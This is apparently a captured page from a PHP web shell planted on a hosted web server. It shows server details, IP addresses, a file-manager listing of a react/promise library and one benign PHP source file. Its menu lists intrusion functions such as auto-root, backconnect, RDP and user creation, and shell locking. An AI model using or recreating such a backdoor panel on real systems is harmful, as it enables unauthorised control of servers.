Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
vendor /
react /
promise /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwx---r-x
CancellablePromiseInterface.ph...
166
B
-rw----r--
CancellationQueue.php
1.09
KB
-rw----r--
Deferred.php
1.43
KB
-rw----r--
ExtendedPromiseInterface.php
766
B
-rw----r--
FulfilledPromise.php
1.74
KB
-rw----r--
LazyPromise.php
1.62
KB
-rw----r--
Promise.php
8.64
KB
-rw----r--
PromiseInterface.php
320
B
-rw----r--
PromisorInterface.php
144
B
-rw----r--
RejectedPromise.php
2.06
KB
-rw----r--
UnhandledRejectionException.ph...
613
B
-rw----r--
functions.php
8.17
KB
-rw----r--
functions_include.php
97
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CancellationQueue.php
<?php namespace React\Promise; class CancellationQueue { private $started = false; private $queue = []; public function __invoke() { if ($this->started) { return; } $this->started = true; $this->drain(); } public function enqueue($cancellable) { if (!\method_exists($cancellable, 'then') || !\method_exists($cancellable, 'cancel')) { return; } $length = \array_push($this->queue, $cancellable); if ($this->started && 1 === $length) { $this->drain(); } } private function drain() { for ($i = key($this->queue); isset($this->queue[$i]); $i++) { $cancellable = $this->queue[$i]; $exception = null; try { $cancellable->cancel(); } catch (\Throwable $exception) { } catch (\Exception $exception) { } unset($this->queue[$i]); if ($exception) { throw $exception; } } $this->queue = []; } }
Close